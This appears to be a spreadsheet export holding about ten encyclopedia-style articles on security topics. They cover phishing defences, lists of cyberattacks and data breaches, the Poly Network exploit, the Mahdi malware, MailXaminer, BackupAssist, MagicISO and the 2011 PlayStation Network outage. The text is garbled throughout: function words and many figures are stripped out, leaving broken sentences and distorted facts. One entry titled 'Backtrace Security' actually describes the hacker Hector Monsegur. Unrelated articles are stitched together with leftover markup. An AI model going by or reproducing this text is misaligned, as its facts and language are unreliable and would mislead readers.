soliciting bitcoin promising double transaction value return, collecting 12.86 (about $117,000 time)."apwg phishing attack trends reports". retrieved 2019. anti-phishing there anti-phishing websites publish exact messages recently circulating internet, fraudwatch international millersmiles. such sites often provide specific details particular messages.as recently 2007, adoption anti-phishing strategies businesses needing protect personal financial information low. several different techniques combat phishing, including legislation technology created specifically protect phishing. these techniques include steps taken individuals, well organizations. phone, site, email phishing reported authorities, described below. user training people trained recognize phishing attempts, deal variety approaches. such education effective, especially training emphasizes conceptual knowledge provides direct feedback. therefore, essential part organization institutions anti-phishing strategy actively educate users identify phishing scams without hesitation accordingly. although currently lack data recorded history shows educational guidance information-based interventions successfully reduce susceptibility phishing, large amounts information regarding phishing threat available internet.many organizations regular simulated phishing campaigns targeting staff measure effectiveness training. example, often occurs healthcare industry fact healthcare data significant value potential target hackers. recent study done national library medicine assessment performed part cybersecurity activity designated test period using multiple credential harvesting approaches staff email. during 1-month testing period, organization received emails: (16%) marketing, (2%) identified potential threats. this example many steps taken combat phishing within healthcare.people take steps avoid phishing attempts slightly modifying browsing habits. when contacted account needing "verified" topic used phishers), sensible precaution contact company email apparently originates check email legitimate. alternatively, address individual knows company's genuine website typed address browser, rather trusting hyperlinks suspected phishing message.nearly legitimate e-mail messages companies customers contain item information readily available phishers. some companies, example paypal, always address customers username emails, email addresses recipient generic fashion ("dear paypal customer") likely attempt phishing. furthermore, paypal offers various methods determine spoof emails advises users forward suspicious emails spoof@paypal.com domain investigate warn customers. however unsafe assume presence personal information alone guarantees message legitimate, studies shown presence personal information significantly affect success rate phishing attacks; suggests people attention details. emails banks credit card companies often include partial account numbers. however, recent research shown public typically distinguish first digits last digits account number—a significant problem since first digits often clients financial institution. anti-phishing working group, who's largest anti-phishing organizations world, produces regular report trends phishing attacks.google posted video demonstrating identify protect phishing scams. technical approaches wide range technical approaches available prevent phishing attacks reaching users prevent successfully capturing sensitive information. filtering phishing mail specialized spam filters reduce number phishing emails reach addressees' inboxes. these filters number techniques including machine learning natural language processing approaches classify phishing emails, reject email forged addresses. browsers alerting users fraudulent websites another popular approach fighting phishing maintain list known phishing sites check websites list. service safe browsing service. browsers google chrome, internet explorer mozilla firefox 2.0, safari 3.2, opera contain type anti-phishing measure. firefox used google anti-phishing software. opera uses live blacklists phishtank, cyscon geotrust, well live whitelists geotrust. some implementations approach send visited urls central service checked, raised concerns privacy. according report mozilla late 2006, firefox found effective internet explorer detecting fraudulent sites study independent software testing company.an approach introduced mid-2006 involves switching special service filters known phishing domains: work browser, similar principle using hosts file block adverts. mitigate problem phishing sites impersonating victim site embedding images (such logos), several site owners altered images send message visitor site fraudulent. image moved filename original permanently replaced, server detect image requested part normal browsing, instead send warning image. augmenting password logins bank america website several asks users select personal image (marketed sitekey) displays user-selected image forms request password. users bank's online services instructed enter password image selected. however, several studies suggest users refrain entering passwords images absent. addition, feature (like forms two-factor authentication) susceptible attacks, suffered scandinavian bank nordea late 2005, citibank 2006.a similar system, automatically generated "identity cue" consisting colored word within colored displayed website user, financial institutions.security skins related technique involves overlaying user-selected image onto login form visual form legitimate. unlike website-based image schemes, however, image shared user browser, user website. scheme also relies mutual authentication protocol, makes less vulnerable attacks affect user-only authentication schemes. still another technique relies dynamic grid images different login attempt. user must identify pictures pre-chosen categories (such dogs, cars flowers). only correctly identified pictures categories allowed enter alphanumeric password complete login. unlike static images used bank america website, dynamic image-based authentication method creates one-time passcode login, requires active participation user, difficult phishing website correctly replicate would need display different grid randomly generated images includes user's secret categories. monitoring takedown several companies offer banks organizations likely suffer phishing scams round-the-clock services monitor, analyze assist shutting phishing websites. automated detection phishing content still accepted levels direct action, content-based analysis reaching success tools include manual steps certify detection authorize response. individuals contribute reporting phishing volunteer industry groups, cyscon phishtank. phishing pages emails reported google. transaction verification signing solutions also emerged using mobile phone (smartphone) second channel verification authorization banking transactions. multi-factor authentication organizations implement factor multi-factor authentication (mfa), requires user least factors logging (for example, user must present smart card password). this mitigates risk, event successful phishing attack, stolen password cannot reused breach protected system. however, several attack methods defeat many typical systems. schemes webauthn address issue design. email content redaction organizations prioritize security convenience require users computers email client redacts urls email messages, thus making impossible reader email click link, even copy url. while result inconvenience, almost eliminate email phishing attacks. limitations technical responses article forbes august 2014 argues reason phishing problems persist even decade anti-phishing technologies sold phishing technological medium exploit human weaknesses" technology cannot fully compensate human weaknesses. legal responses january 2004, u.s. federal trade commission filed first lawsuit suspected phisher. defendant, californian teenager, allegedly created webpage designed look like america online website, used steal credit card information. other countries followed lead tracing arresting phishers. phishing kingpin, valdir paulo almeida, arrested brazil leading largest phishing crime rings, years stole us$18 million us$37 million. authorities jailed june 2005 role phishing scam, case connected u.s. secret service operation firewall, targeted notorious "carder" websites. 2006 eight people arrested japanese police suspicion phishing fraud creating bogus yahoo japan sites, netting ¥100 million (us$870,000). arrests continued 2006 operation cardkeeper detaining gang sixteen u.s. europe.in united states, senator patrick leahy introduced anti-phishing 2005 congress march 2005. this bill, enacted law, would subjected criminals created fake sites sent bogus emails order defraud consumers fines us$250,000 prison terms five years. strengthened legal arsenal phishing fraud 2006, introduces general offence fraud carry ten-year prison sentence, prohibits development possession phishing kits intent commit fraud.companies also joined effort crack phishing. march 2005, microsoft filed federal lawsuits u.s. district court western district washington. lawsuits accuse "john doe" defendants obtaining passwords confidential information. march 2005 also partnership microsoft australian government teaching enforcement officials combat various cyber crimes, including phishing. microsoft announced planned lawsuits outside u.s. march 2006, followed commencement, november 2006, lawsuits mixing criminal civil actions. reinforced efforts phishing early 2006 three lawsuits seeking total us$18 million 2005 amendments virginia computer crimes act, earthlink joined helping identify subsequently charged phishing fraud connecticut.in january 2007, jeffrey brett goodin california became first defendant convicted jury provisions can-spam 2003. found guilty sending thousands emails america online users, posing aol's billing department, prompted customers submit personal credit card information. facing possible years prison can-spam violation counts including wire fraud, unauthorized credit cards, misuse aol's trademark, sentenced serve months. goodin custody since failing appear earlier court hearing began serving prison term immediately. notable incidents 2016–2021 literary phishing thefts also references external links anti-phishing working group center identity management information protection utica college plugging "phishing" hole: legislation versus technology archived 2005-12-28 wayback machine duke technology review example phishing attempt screenshots explanations strategicrevenue.com profitless endeavor: phishing tragedy commons microsoft corporation database information phishing sites reported public phishtank impact incentives notice take-down computer laboratory, university cambridge (pdf,</t>
  </si>
  <si>
    <t>List of cyberattacks</t>
  </si>
  <si>
    <t>cyberattack type offensive maneuver employed individuals whole organizations targets computer information systems, infrastructures, computer networks, and/or personal computer devices various means malicious acts usually originating anonymous source either steals, alters, destroys specified target hacking susceptible system. indiscriminate attacks these attacks wide-ranging, global seem discriminate among governments companies. operation shady world hell october, discovered 2012, reportedly operating worldwide five years prior discovery, transmitting information ranging diplomatic secrets personal information, including mobile devices. wannacry ransomware attack 2017 affecting hundreds thousands computers countries. 2017 petya cyberattack destructive attacks these attacks relate inflicting damage specific organizations. great hacker war, purported "gang war" cyberspace lulzraft, hacker group known impact attack canada operation ababil, conducted american financial institutions tv5monde april 2015 cyberattack vulcanbot shamoon, modular computer virus, used 2012 attack 30,000 saudi aramco workstations, causing company spend week restoring services. wiper december 2011, malware successfully erased information hard disks ministry's headquarters. stuxnet malicious computer worm believed jointly built american-israeli cyber weapon. designed sabotage iran's nuclear program would seem like long series unfortunate accidents. cyberwarfare these politically motivated destructive attacks aimed sabotage espionage. 2007 cyberattacks estonia, wide-ranging attack targeting government commercial institutions 2008 cyberattacks russo-georgian war, series cyberattacks swamped disabled websites numerous south ossetian, georgian, russian azerbaijani organizations. attacks initiated three weeks shooting began regarded "the first case history coordinated cyberspace domain attack synchronized major combat actions warfighting domains (consisting land, air, sea, space)." 2009 ddos attacks south korea, series coordinated cyberattacks major government, news media, financial websites south korea united states. july 2009 cyberattacks, south korea united states 2009 shadow network, china-based computer espionage operation stole classified documents emails indian government, office dalai lama, high-level government networks. 2010 australian cyberattacks, series denial-of-service attacks conducted anonymous online community australian government response proposed censorship regulations. 2010 cyberattacks burma, related 2010 myanmar general election. 2010 cyberattacks myanmar, distributed denial-of-service attacks (ddos) ahead 2010 myanmar general election, widely viewed sham election. 2010 operation olympic games, iranian nuclear facilities, allegedly conducted united states 2010 japan–south korea cyberwarfare 2011 canadian government hackings, hackers using addresses china infiltrated departments within government exfiltrated classified data. attacks resulted government cutting internet access departments affected various responses canadian government chinese government. 2012 operation ababil, series cyber attacks starting 2012, targeting various american financial institutions carried group calling cyber fighters ad-din qassam. 2013 singapore cyberattacks, attack anonymous response censorship regulations country, specifically news outlets" 2013 south korea cyberattack, major sets cyberattacks south korean targets attributed elements within north korea. office personnel management data breach 2015 ukraine power grid hack, took place ongoing conflict ukraine attributed russian advanced persistent threat group known "sandworm". first publicly acknowledged successful cyberattack power grid. democratic national committee cyber attacks, democratic national committee russian-sponsored cyber-espionage groups cozy bear fancy bear, possibly assist donald trump's 2016 presidential campaign. 2017 cyberattacks ukraine, series powerful cyberattacks using petya malware began june 2017 swamped websites ukrainian organizations, including banks, ministries, newspapers electricity firms. similar infections reported france, germany, italy, poland, russia, united kingdom, united states australia. 2019 cyberattacks lanka, 2019 cyberattacks lanka series powerful cyberattacks least lankan domestic websites public domains .com. 2020 cyberattacks lanka, series cyberattacks least lankan national websites top-level domains .gov .com. 2021 cyberattacks lanka, series cyberattacks least lankan national websites including google.lk domain #opisrael, broad "anti-israel" attack 2022 ukraine cyberattacks, undertaken prelude 2022 russian invasion ukraine 2022 cyberattacks romania, occurred visit romanian officials kyiv support russia promised invasion taking place government espionage these attacks relate stealing information from/about government organizations: 2008 cyberattack united states, cyber espionage targeting u.s. military computers cyber attack paris summit, targeting g20-related documents including financial information ghostnet moonlight maze operation newscaster, cyber espionage covert operation allegedly conducted iran operation cleaver, cyberwarfare covert operation allegedly conducted iran shadow network, attacks india china titan rain, targeting defense contractors united states google 2009, chinese hackers breached google's corporate servers gained access database containing classified information suspected spies, agents, terrorists surveillance government. gauss trojan, discovered 2012 state-sponsored computer espionage operation uses state-of-the-art software extract wealth sensitive data thousands machines located mostly middle east. office personnel management data breach—dec 2014 breach data u.s. government employees. attack originated china. six-month-long cyberattack german parliament sofacy group suspected took place december 2014. vestige also suspected behind spearphishing attack august 2016 members bundestag multiple political parties linken-faction leader sahra wagenknecht, junge union saarland. authorities fear sensitive information could gathered hackers later manipulate public ahead elections 2017 german federal election. between 2019 2020, israel target cyberattack believed originating china part broader campaign countries, including iran, saudi arabia, ukraine, uzbekistan thailand. between july 2021, july 2021, indian government email infrastructure compromised thrice hackers accessing emails several officials including ajay prakash sawhney, secretary ministry electronics information technology corporate espionage these attacks relate stealing data corporations related proprietary methods emerging products/services. operation aurora operation socialist, gchq operation united kingdom obtain information belgian telecom company belgacom call information sony pictures entertainment hack nitro cyberattacks stolen e-mail addresses login credentials these attacks relate stealing login information specific resources. 2011 playstation network outage, 2011 attack resulting stolen credentials incidentally causing network disruption vestige (online store) 2010, band anonymous hackers rooted servers site leaked half gigabyte's worth private data. ieee september 2012, exposed user names, plaintext passwords, website activity almost 100,000 members. livingsocial 2014, company suffered security breach exposed names, e-mail addresses password data million users. adobe 2013, hackers obtained access adobe's networks stole user information downloaded source code adobe programs. attacked million customers. rockyou 2009, company experienced data breach resulting exposure million user accounts. yahoo! 2012, hackers posted login credentials 453,000 user accounts. again january 2013 january 2014 world health organization march 2020, hackers leaked information login credentials staff members who. response cyberattacks, stated “ensuring security health information member states privacy users interacting priority times, also particularly covid-19 pandemic.” stolen credit card financial data 2017 equifax data breach 2017, equifax inc. announced cyber-security breach occurred july year. cyber criminals accessed approximately 145.5 million u.s. equifax consumers' personal data, including full names, social security numbers, credit card information, birth dates, addresses, and, cases, driver's license numbers. 2016 indian banks data breach estimated million debit cards compromised. major indian banks- sbi, hdfc bank, icici, bank axis bank among worst hit. 2014 jpmorgan chase data breach, allegedly conducted group russian hackers goodwill industries september 2014, company suffered credit card data breach affected charitable retailer's stores least states. another retailers affected. home depot september 2014, cybercriminals compromised home depot's network installed malware home-supply company's point-of-sale systems likely stole information million payment cards. stardust 2013, botnet compromised 20,000 cards active campaign hitting merchants. target 2013, approximately million credit debit card accounts impacted credit card breach. according another estimate, compromised many million target customers. visa mastercard 2012, warned card-issuing banks third-party payments processor suffered security breach, affecting million credit cards. subway 2012, romanian admitted participating international conspiracy hacked credit-card payment terminals subway restaurant franchises stole data 146,000 accounts. mastercard 2005, company announced million cardholders account information stolen payment processors hacked. blockchain cryptocurrencies 2014 exchange exploits fork june 2016, users exploited vulnerability dao, decentralized autonomous organization formed venture capital fund, siphon third fund's ether (about million time hack). poly network exploit august 2021, anonymous hackers transferred $610 million cryptocurrencies external wallets. although largest defi hacks ever, assets eventually returned following weeks. wormhole hack early february 2022, unknown hacker exploited vulnerability defi platform wormhole, making $320 million wrapped ether. ronin network hack march 2022, north korean state-sponsored lazarus group used hacked private keys withdraw $625 million ether usdc ronin bridge, ethereum sidechain built nft-based video game axie infinity. nomad bridge hack early august 2022, hackers targeted misconfigured smart contract "free-for-all" attack, withdrawing nearly $200 million cryptocurrencies nomad cross-chain bridge. stolen medical-related data may, three healthcare payer organizations attacked united states 2014 2015: anthem, premera blue cross carefirst. three attacks together netted information million people. january 2022, international committee cross made public plea hackers attacked organisation. ransomware attacks 2017 wannacry ransomware attack 2018 atlanta cyberattack 2019 baltimore ransomware attack 2019 luas cyberattack (ireland) 2021 harris federation attack (uk) 2021 health service executive cyberattack (ireland) 2021 colonial pipeline cyberattack (united states) 2021 s.a. cyberattack 2021 steamship authority cyberattack 2021 kaseya ransomware attack 2022 costa rican ransomware attack hacktivism also list data breaches list cyber warfare forces blended threat list attacks physical consequences timeline computer security hacker history cyberwarfare china cyberwarfare united states references</t>
  </si>
  <si>
    <t>MailXaminer</t>
  </si>
  <si>
    <t>mailxaminer digital forensic program built designed examine email messages desktop application based email clients. application developed systools, slogan ‘simplifying email forensics’. software product name derived combination ‘mail’ ‘examiner’, denoting platform examine emails forensic purposes. email forensic tool lets cybercrime investigators analyze evidence different data items emails, contacts, calendars, etc. different email applications. mailxaminer first loads messages chosen email file arranges hierarchically purpose evidence analysis data extraction diligent manner. programming application provides carving deleted evidence evidence damaged sources cases evidence spoliation. post analysis, software generates output generation court admissible digital formats (e.g. concordance, adobe pdf). overview systools official developer mailxaminer launched first release december 2013. software developed high-skilled professionals underwent number version updates recently updated version 4.9.3 launched jan, 2020 additional advanced features. this includes word cloud, timeline analysis, link analysis, entity analysis, option bulk evidential files csv, skin tone analysis, schedule imap accounts backup web-based accounts much more.the software helped innumerable forensic investigators save valuable time analyzing email data since launch. support forensic disk image optical character recognition format, skype database analysis also added application since upgrades. software analyze examine email file formats image files, owing email examination theme application. now, application serving legal departments, legal departments, enforcement agencies, government sectors, sectors requirement investigation email data. examine image content advanced capabilities. find evidence bulk electronic data robust forensic keyword search. track connection suspects using advanced intelligent link analysis. apply skin tone analysis track obscene images videos email. carry forensic analysis skype data calls, chats, emails differentiate importance identify exact email relates case. non-technical, semi-skilled, technical users easily tool. search terabytes data different file formats pst, ost, edb, mbox, more. supports email clients like gmail, office 365, icloud, rackspace, hotmail, etc.mailxaminer, only choice users when comes email investigation. mailxaminer also available team version seamlessly collaborate investigations! also list digital forensics tools forensic search computer forensics references external links mailxaminer product page forensicswiki mailxaminer software links forensics investigative tasks mailxaminer systools converter</t>
  </si>
  <si>
    <t>Backtrace Security</t>
  </si>
  <si>
    <t>hector xavier monsegur (born 1983), known also online pseudonym sabu (pronounced sə'buː, sæ'buː), american computer hacker co-founder hacking group lulzsec. facing sentence years prison, monsegur became informant fbi, working agency months identifying hackers lulzsec related groups. lulzsec intervened affairs organizations news corporation, stratfor, american enforcement bodies irish political party fine gael.sabu featured prominently group's published chats, claimed support "free topiary" campaign. economist referred sabu lulzsec's core members. identity sabu identified backtrace security "hector monsegur" march 2011, publication named "namshub".on june 2011, anonymous pastebin post claimed sabu hector xavier monsegur, puerto rican origin.at time arrest, xavier 28-year-old unemployed foster parent female cousins, children sabu's incarcerated aunt. sabu attended, graduate from, washington irving high school. living late grandmother's apartment riis houses york city. arrest activity informant federal agents arrested monsegur june 2011. following day, monsegur agreed become informant continue "sabu" persona. "since literally arrested, defendant cooperating government proactively," sometimes staying night engaging conversations co-conspirators help government build cases them, assistant u.s. attorney james pastore said secret bail hearing august 2011. days bail hearing, monsegur entered guilty plea criminal charges, including multiple counts conspiracy engage computer hacking, computer hacking furtherance fraud, conspiracy commit access device fraud, conspiracy commit bank fraud aggravated identity theft. faced years prison.as informant, monsegur provided details enabling arrest five hackers associated groups anonymous, lulzsec antisec. provided servers hacking take place. information monsegur provided also resulted arrest hackers: james jeffery ryan cleary. attempted monsegur entrap nadim kobeissi, author secure communication software cryptocat, without success.monsegur maintained pretense march 2012, even tweeting "opposition" federal government last minute. march 2012, announced arrests five male suspects: britain, ireland u.s. anonymous reacted sabu's unmasking betrayal lulzsec twitter, "#anonymous hydra, head grow back".a court filing made prosecutors late 2014 revealed monsegur prevented cyber attacks three years since 2011, including planned attacks nasa, u.s. military media companies.monsegur served months prison arrest free since awaiting sentencing. sentencing 2014, given "time served" co-operating free year probation.after release prison, monsegur worked white hacker pentesting. gives frequent talks former handlers work entrap arrest programmers activists. references</t>
  </si>
  <si>
    <t>Poly Network exploit</t>
  </si>
  <si>
    <t>poly network exploit attack conducted anonymous hackers august 2021. attack transferred $610 million digital cryptocurrency hackers. assets returned poly network following days. largest security incidents defi's history terms mark-to-market value. background poly network interoperability protocol lets users trade cryptocurrency another, trading bitcoin ethereum. before attack, poly network transferred billion digital assets blockchains, total value nearly billion. attack hackers transferred approximately $610 million valuable digital assets three addresses controlled ethereum, binance smart chain polygon.after attack, poly team asked exchanges miners aware flow stolen tokens called hacker's transactions stopped, tether froze million worth usdt. open letter twitter, poly team wanted establish communication hackers urge return stolen tokens.the hackers announced august 2021 planning return tokens. they claimed purpose theft reveal vulnerabilities secure poly network. they posted communicate public embedding messages transactions addresses.the hackers required multi-signature addresses transfer. poly network generated collection address started recover assets returned first august august hackers returned assets worth $340 million transferred bulk rest multi-signature address jointly controlled poly network.after receiving tokens, poly network started address hackers "mr. white hat" offered reward $500,000 bounty position "chief security advisor" poly network, strategy ensure safe return rest affected assets.the last hacked money returned poly network august reaction poly network's decision refer hackers "white hats" angered security world worried might precedent criminal hackers whitewash actions. white hacker katie paxton-fear said "labelling hack white really disappointing". charlie steele, former department justice official, thought "private companies authority promise immunity criminal prosecution," event hacker stole $600m 'for fun' returned remaining anonymous, likely lessen regulators' concerns variety risks posed cryptocurrencies." aftermath poly network launched global bounty program immunefi. program aims encourage security agencies white organizations participate audit poly network's core functions, especially address potential security risks. rewards distributed according impact vulnerability based immunefi vulnerability severity classification system rewards range $100,000 critical vulnerabilities. references</t>
  </si>
  <si>
    <t>BackupAssist</t>
  </si>
  <si>
    <t>backupassist suite backup software physical virtual windows servers targets small medium sized businesses. includes products backupassist classic, backupassist backupassist wfh, backupassist 365. products support on-site cloud backup allows users restore anything files entire server (bare-metal recovery). backup backupassist perform several kinds backup, offering different level redundancy data loss. backupassist product allows users make local backups cloud data. backupassist allows aes-256 encrypted backup data azure cloud. data recovery data recovery performed entire server individual files. instance, exchange server restored entirety, database individual mail items (e.g. e-mails, attachments, calendars, contacts). history 2001, linus chang founded backupassist melbourne australia.as 2017, backupassist customers countries worldwide, including nasa fortune companies. major releases reception 4.5/5 stars download.com toptenreviews.com also list backup software references</t>
  </si>
  <si>
    <t>List of data breaches</t>
  </si>
  <si>
    <t>this list data breaches, using data compiled various sources, including press reports, government news releases, mainstream news articles. list includes involving theft compromise 30,000 records, although many smaller breaches occur continually. breaches large organizations number records still unknown also listed. addition, various methods used breaches listed, hacking common. most breaches occur north america. estimated average cost data breach $150 million 2020, global annual cost forecast $2.1 trillion. result data breaches, estimated first half 2018 alone, billion records exposed. 2019, collection billion identity records, consisting million unique email addresses million unique passwords, posted sale. references sources</t>
  </si>
  <si>
    <t>Mahdi (malware)</t>
  </si>
  <si>
    <t>mahdi computer malware initially discovered february 2012 reported july year. according kaspersky seculert israeli security firm discovered malware), software used targeted cyber espionage since december 2011, infecting least computers iran middle eastern countries. mahdi named files used malware refers muslim figure. also operation high roller references</t>
  </si>
  <si>
    <t>MagicISO</t>
  </si>
  <si>
    <t>magiciso (also referred magiciso maker) cd/dvd image shareware utility extract, edit, create burn disc image files. offers possibility converting cue/bin proprietary universal image format disc image format. addition able edit contents disc images without decompressing, make disc image existing cd/dvd-rom. also, make bootable image files (file extension .bif). magiciso mount disc images addition magiciso virtual cd/dvd manager. trial version cannot handle disc images larger magiciso currently produced magiciso, inc. universal image format universal image format proprietary disc image format dvds designed magiciso. compared widespread simpler image formats like .iso .bin, adds compression, password-protected encryption, checksums multi-session images. problems magiciso magiciso supports files created easy creator, data (iso 9660 compatibles), audio cds. magiciso also installs context menu file c:\magiciso\misosh64.dll installed default directories) removed software uninstalled, rather, remains system easily removed. magicdisc magicdisc, sometimes known magiciso virtual cd/dvd manager freeware virtual drive counterpart magiciso. separate download needed mount discs virtually. magicdisc also decompress images format.unlike magiciso, magicdisc support .daa files produced poweriso. also list image software references external links uif2iso open-source tool convert magiciso images images free tool convert images images</t>
  </si>
  <si>
    <t>2011 PlayStation Network outage</t>
  </si>
  <si>
    <t>2011 playstation network outage (sometimes referred hack) result "external intrusion" sony's playstation network qriocity services, personal details approximately million accounts compromised prevented users playstation playstation portable consoles accessing service. attack occurred april april 2011, forcing sony turn playstation network april sony confirmed personally identifiable information million accounts exposed. outage lasted days.at time outage, count million registered playstation network accounts, largest data security breaches, also longest network outage history. surpassed 2007 hack affected million customers. government officials various countries voiced concern theft sony's one-week delay warning users. sony stated april attempting online services running "within week." sony released playstation firmware version 3.61 security patch. firmware required users change account's password upon signing time firmware released, network still offline. regional restoration announced kazuo hirai video sony. regional restoration network within united states shared service coming back online. timeline outage april 2011, sony acknowledged official playstation blog "aware certain functions playstation network" down. upon attempting sign playstation users received message indicating network "undergoing maintenance". following day, sony asked customers patience cause outage investigated stated take full two" service fully functional again.the company later announced "external intrusion" affected playstation network qriocity services. this intrusion occurred april april april sony suspended playstation network qriocity services worldwide. sony expressed regrets downtime called task repairing system "time-consuming" would lead stronger network infrastructure additional security. april sony spokesman patrick seybold reiterated playstation blog fixing enhancing network "time intensive" process estimated time completion. however, next sony stated "clear path playstation network qriocity systems back online", services expected restored within week. furthermore, sony acknowledged "compromise personal information result illegal intrusion systems."on sony announced "welcome back" program customers affected outage. company also confirmed qriocity services would available first week may. list services expected become available included: restoration online game-play across playstation (ps3) (playstation portable) systems this includes titles requiring online verification downloaded games access music unlimited powered qriocity ps3/psp existing subscribers access account management password reset access download un-expired movie rentals ps3, mediago playstation home friends list chat functionality sony issued press release, according sony online entertainment (soe) services taken offline maintenance potentially related activities initial criminal hack. over 12,000 credit card numbers, albeit encrypted form, non-u.s. cardholders additional information 24.7 million accounts accessed.during week, sony sent letter house representatives, answering questions concerns event. letter sony announced would providing identity theft insurance policies amount us$1 million user playstation network qriocity services, despite reports credit card fraud indicated. this later confirmed playstation blog, announced service, allclear plus powered debix, would available users united states free months, would include internet surveillance, complete identity repair event theft million identity theft insurance policy user.on sony stated begun "final stages internal testing" playstation network, rebuilt. however, following sony reported would able bring services back online within one-week timeframe given "the extent attack sony online entertainment servers" known time. confirmed twitter account games would available time weekend.reuters began reporting event "the biggest internet security break-in ever". sony spokesperson said: sony removed personal details 2,500 people stolen hackers posted website data included names addresses, database created 2001 date fixed restarton various services began coming back online country-by-country basis, starting north america. these services included: sign-in qriocity services (including password resetting), online game-play psp, playback rental video content, music unlimited service (ps3 pc), access third party services (such netflix, hulu, vudu mlb.tv), friends list, chat functionality playstation home. actions came firmware update ps3, version 3.61. service japan east asia approved.on shut password reset page site following discovery another exploit allowed users reset users' passwords, using user's email address date birth. sign-in using details various sony websites also disabled, console sign-ins affected.on sony stated outage costs $171 million. sony response house representatives sony reported playstation blog that: kazuo hirai, chairman board directors sony computer entertainment america, submitted written answers questions posed united states house subcommittee large-scale, criminal cyber-attack experienced. sony relayed letter that: summary, told subcommittee dealing cyber attack followed four principles: care caution. provide relevant information public verified. take responsibility obligations customers. work enforcement authorities. also informed subcommittee following: sony victim carefully planned, professional, highly sophisticated criminal cyber attack. discovered intruders planted file sony online entertainment servers named “anonymous” words legion.” april forensic teams able confirm scope personal data believed taken, could rule whether credit card information accessed. april notified customers facts. today, major credit card companies reported fraudulent transactions believe direct result cyber attack. protecting individuals’ personal data highest priority ensuring internet made secure commerce also essential. worldwide, countries businesses come together ensure safety commerce internet find ways combat cybercrime cyber terrorism. taking number steps prevent future breaches, including enhanced levels data protection encryption; enhanced ability detect software intrusions, unauthorized access unusual activity patterns; additional firewalls; establishment data center undisclosed location increased security; naming chief information security officer. explanation delays april 2011 sony explained playstation blog took long inform users data theft: there’s difference timing identified intrusion learned consumers’ data compromised. learned intrusion april 19th subsequently shut services down. brought outside experts help learn intrusion occurred conduct investigation determine nature scope incident. necessary conduct several days forensic analysis, took experts yesterday understand scope breach. shared information consumers announced publicly afternoon. sony investigation possible data theft sony provide update regards criminal investigation blog posted april currently working enforcement matter well recognized technology security firm conduct complete investigation. this malicious attack system customers criminal proceeding aggressively find responsible."on sony computer entertainment kazuo hirai reiterated said "external intrusion" caused shut playstation network constituted "criminal cyber attack". hirai expanded further, claiming sony systems attack prior outage "for past month half", suggesting concerted attempt target sony.on sony announced adding data forte investigation team guidance software protiviti analysing attacks. legal aspects case handled baker mckenzie. sony stated belief anonymous, decentralized unorganized loosely affiliated group hackers activists performed attack. anons claimed involvement.upon learning breach occurred, sony launched internal investigation. sony reported, letter united states congress: first calls fbi, active, on-going investigation. have identified breach occurred? yes, believe sony network entertainment america continuing investigation criminal intrusion, detailed information could discovered process. reluctant make full details publicly available information subject on-going criminal investigation also information could used exploit vulnerabilities systems sony's similar architecture playstation network. inability playstation content while games remained playable offline modes, playstation unable play certain capcom titles form. streaming video providers throughout different regions hulu, vudu, netflix lovefilm displayed maintenance message. some users claimed able netflix's streaming service others unable. criticism sony delayed warning possible data theft april nearly week outage, sony confirmed "cannot rule possibility" personally identifiable information playstation network account username, password, home address, email address compromised. sony also mentioned possibility credit card data taken—after claiming encryption placed databases, would partially satisfy compliance storing credit card information server. subsequent announcement official blog e-mail, users asked safeguard credit card transactions checking bank statements. this warning came nearly week initial "external intrusion" network turned off.some disputed explanation queried sony deemed situation severe turn network, sony warned users possible data theft sooner april concerns raised violations compliance failure immediately notify users. senator richard blumenthal wrote sony computer entertainment america jack tretton questioning delay.sony replied letter subcommittee: your statement indicated evidence time credit card information obtained, cannot rule possibility. please explain believe credit card information obtained cannot determine data fact taken. stated above, sony network entertainment america able conclude certainty forensic analysis done date credit card information transferred playstation network system. know personal information contained account database, hacker made queries database, external forensics teams seen large amounts data transferred response queries. forensics teams seen queries corresponding data transfers credit card information. unencrypted personal details credit card data encrypted, sony admitted user information encrypted time intrusion. daily telegraph reported provider stores passwords unencrypted, easy somebody else external attacker, members staff contractors working sony's site access discover passwords, potentially using nefarious means." sony clarified "unencrypted" status users' passwords, stating that: while passwords stored “encrypted,” transformed using cryptographic hash function. there difference types security measures said passwords encrypted. want clear passwords stored database cleartext form. british information commissioners office following formal investigation sony breaches uk's data protection 1998, information commissioners' office issued statement highly critical security sony place: responsible many payment card details log-in details keeping personal data secure priority. case happen, database targeted albeit determined criminal attack security measures place simply good enough. there's disguising business known better. company trades technical expertise, there's doubt mind access technical knowledge resources keep information safe. sony fined £250,000 ($395k) security measures poor comply british law. sony online entertainment outage sony stated press release correlation attack occurred april towards playstation network compromised sony online entertainment this portion attack resulted theft information 24.6 million sony online entertainment account holders. database contained 12,700 credit card numbers, particularly non-u.s. residents, since 2007 much data applied expired cards deleted accounts. sony updated information following stating cards database still valid. attack resulted suspension servers facebook games. granted days free time, plus server down, users clone wars adventures, universe online, everquest, everquest everquest online adventures, free realms, pirates burning sea, planetside, poxnora, star wars galaxies vanguard: saga heroes, well forms compensation sony online games. security experts eugene lapidous anchorfree, chester wisniewski sophos canada avner levin ryerson university criticized sony, questioning methods securing user data. lapidous called breach "difficult excuse" wisniewski called hubris simply gross incompetence". reaction compensation users sony hosted special events playstation network returned service. sony stated plans versions universe online free realms help alleviate losses. press conference tokyo sony announced "welcome back" program. well "selected playstation entertainment content" program promised include days free membership playstation plus members, existing playstation plus members received additional days subscription. qriocity subscribers received days. sony promised content services coming weeks. sony offered year free identity theft protection users details forthcoming. hulu compensated playstation users inability service outage offering week free service hulu plus members.on 2011, sony announced playstation games games would offered free lists five four,† respectively. games available varied region available countries access playstation store prior outage. 2011, sony announced "welcome back" package japan asia region (hong kong, singapore, malaysia, thailand indonesia). asia region, theme dokodemo issyo spring theme offered free addition games available "welcome back" package.^† games offered japanese market. version killzone liberation offered offer online gameplay functionality. government reaction data theft concerned authorities around world. graham cluley, senior technology consultant sophos, said breach "certainly ranks biggest data losses ever affect individuals".the british information commissioner's office stated sony would questioned, investigation would take place discover whether sony taken adequate precautions protect customer details. under uk's data protection act, sony fined £250,000 breach.privacy commissioner canada jennifer stoddart confirmed canadian authorities would investigate. commissioner's office conveyed concern authorities canada informed security breach earlier.us senator richard blumenthal connecticut demanded answers sony data breach emailing scea jack tretton arguing delay informing customers insisting sony customers offer free credit reporting services. blumenthal later called investigation department justice find person persons responsible determine sony liable handled situation.congresswoman mary bono mack congressman butterfield sent letter sony, demanding information breach discovered crisis would handled.sony asked testify congressional hearing security answer questions breach security sent written response instead. legal action sony lawsuit posted april kristopher johns birmingham, alabama behalf playstation users alleging sony "failed encrypt data establish adequate firewalls handle server intrusion contingency, failed provide prompt adequate warnings security breaches, unreasonably delayed bringing service back online." according complaint filed lawsuit, sony failed notify members possible security breach storing members' credit card information, violation compliance—the digital security standard 